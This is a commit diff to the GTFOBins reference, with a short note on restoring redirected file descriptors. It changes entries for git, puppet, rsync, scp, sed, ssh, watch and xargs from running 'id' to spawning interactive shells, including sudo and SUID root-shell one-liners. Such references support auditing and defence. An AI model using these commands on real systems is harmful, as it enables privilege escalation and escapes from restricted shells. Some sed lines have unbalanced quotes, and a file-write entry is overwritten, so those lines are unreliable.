Make interactive execute whenever possible

Here the trick is to restore those file descriptors (0, 1, 2) that have been
redirected (`dup2`) by the parent process.

First we need to determine which one has been redirected, for example by looking
at `ls -l /proc/$$/fd/`. Then we can use `0<&x`, `1>&x` or `2>&x` to restore 0,
1 or 2 respectively, where `x` is any file descriptor number that points to the
TTY.

It may happen that no file descriptor is unchanged, in that case we can use
`tty` to perform the redirection: sh <$(tty) >$(tty) 2>$(tty)

_gtfobins/git.md

@@ -1,15 +1,9 @@
 ---
 functions:
-  execute-non-interactive:
+  execute-interactive:
-    - code: |
+    - code: PAGER='sh -c "exec sh 0<&1"' git -p help
-        export PAGER=/usr/bin/id
-        git -p help
   sudo-enabled:
-    - code: |
+    - code: PAGER='sh -c "exec sh 0<&1"' sudo -E git -p help
-        export PAGER=/usr/bin/id
-        sudo -E git -p help
   suid-limited:
-    - code: |
+    - code: PAGER='sh -c "exec sh 0<&1"' ./git -p help
-        export PAGER=/usr/bin/id
-        ./git -p help
 ---

_gtfobins/puppet.md

@@ -1,10 +1,8 @@
 ---
 functions:
-  execute-non-interactive:
+  execute-interactive:
-    - description: The executed command output shown in the puppet log format.
+    - code: |
-      code: |
+        puppet apply -e "exec { '/bin/sh -c \"exec sh -i <$(tty) >$(tty) 2>$(tty)\"': }"
-        export CMD="/usr/bin/id"
-        puppet apply -e "exec { '$CMD': logoutput => true }"
   file-write:
     - description: The file path must be absolute.
       code: |
@@ -16,8 +14,6 @@ functions:
         export LFILE=file_to_read
         puppet filebucket -l diff /dev/null $LFILE
   sudo-enabled:
-    - description: The executed command output shown in the puppet log format.
+    - code: |
-      code: |
+        sudo puppet apply -e "exec { '/bin/sh -c \"exec sh -i <$(tty) >$(tty) 2>$(tty)\"': }"
-        export CMD="/usr/bin/id"
-        sudo puppet apply -e "exec { '$CMD': logoutput => true }"
 ---

_gtfobins/rsync.md

@@ -1,9 +1,9 @@
 ---
 functions:
   execute-interactive:
-    - code: rsync -e 'bash -c "exec 10<&0 11>&1 0<&2 1>&2; sh -i"' 127.0.0.1:/dev/null
+    - code: rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
   sudo-enabled:
-    - code: sudo rsync -e 'bash -c "exec 10<&0 11>&1 0<&2 1>&2; sh -i"' 127.0.0.1:/dev/null
+    - code: sudo rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
   suid-enabled:
-    - code: ./rsync -e 'bash -p -c "exec 10<&0 11>&1 0<&2 1>&2; sh -i"' 127.0.0.1:/dev/null
+    - code: ./rsync -e 'sh -p -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
 ---

_gtfobins/scp.md

@@ -1,10 +1,9 @@
 ---
 functions:
-  execute-non-interactive:
+  execute-interactive:
     - code: |
         TF=$(mktemp)
-        CMD="id"
+        echo 'sh 0<&2 1>&2' > $TF
-        echo "$CMD" > "$TF"
         chmod +x "$TF"
         scp -S $TF x y:
   upload:
@@ -22,15 +21,13 @@ functions:
   sudo-enabled:
     - code: |
         TF=$(mktemp)
-        CMD="id"
+        echo 'sh 0<&2 1>&2' > $TF
-        echo "$CMD" > "$TF"
         chmod +x "$TF"
         sudo scp -S $TF x y:
   suid-limited:
     - code: |
         TF=$(mktemp)
-        CMD="id"
+        echo 'sh 0<&2 1>&2' > $TF
-        echo "$CMD" > "$TF"
         chmod +x "$TF"
         ./scp -S $TF a b:
 ---

_gtfobins/sed.md

@@ -2,14 +2,14 @@
 functions:
   execute-interactive:
     - description: GNU version only. Also, this requires `bash`.
-      code: sed -n "1e bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts
+      code: sed -n '1e exec sh 1>&0' /etc/hosts
   execute-non-interactive:
     - description: GNU version only.
       code: sed -n "1e id" /etc/hosts
   file-write:
     - code: |
         LFILE=file_to_write
-        sed -n "1s/.*/DATA/w $LFILE" /etc/hosts
+        sed -n '1e exec sh 1>&0 /etc/hosts
   file-read:
     - code: |
         LFILE=file_to_read
@@ -20,5 +20,5 @@ functions:
         ./sed -e '' "$LFILE"
   sudo-enabled:
     - description: GNU version only. Also, this requires `bash`.
-      code: sudo sed -n "1e /bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts
+      code: sudo sed -n '1e exec sh 1>&0 /etc/hosts
 ---

_gtfobins/ssh.md

@@ -4,7 +4,7 @@ functions:
     - description: Reconnecting may help bypassing restricted shells.
       code: ssh localhost $SHELL --noprofile --norc
     - description: Spawn interactive shell through ProxyCommand option.
-      code: ssh -o ProxyCommand="/bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" x
+      code: ssh -o ProxyCommand=';sh 0<&2 1>&2' x
   upload:
     - description: Send local file to a SSH server.
       code: |
@@ -26,5 +26,5 @@ functions:
         ssh -F $LFILE localhost
   sudo-enabled:
     - description: Spawn interactive root shell through ProxyCommand option.
-      code: sudo ssh -o ProxyCommand="/bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" x
+      code: sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
 ---

_gtfobins/watch.md

@@ -1,12 +1,12 @@
 ---
 functions:
-  execute-non-interactive:
+  execute-interactive:
-    - code: watch /usr/bin/id
+    - code: watch -x sh -c 'reset; exec sh 1>&0 2>&0'
   suid-enabled:
     - description: This keeps the SUID privileges only if the `-x` option is present.
-      code: ./watch -x /usr/bin/id
+      code: ./watch -x sh -c 'reset; exec sh 1>&0 2>&0'
   sudo-enabled:
-    - code: sudo watch /usr/bin/id
+    - code: sudo watch -x sh -c 'reset; exec sh 1>&0 2>&0'
   suid-limited:
-    - code: ./watch /usr/bin/id
+    - code: ./watch 'reset; exec sh 1>&0 2>&0'
 ---

_gtfobins/xargs.md

@@ -3,6 +3,11 @@ functions:
   execute-interactive:
     - description: GNU version only.
       code: xargs -a /dev/null sh
+    - code: echo x | xargs -Iy sh -c 'exec sh 0<&1'
+    - description: Read interactively from `stdin`.
+      code: |
+        xargs -Ix sh -c 'exec sh 0<&1'
+        x^D^D
   file-read:
     - description: This works as long as the file does not contain the NUL character, also a trailing `$'\n'` is added. The actual `/bin/echo` command is executed. GNU version only.
       code: |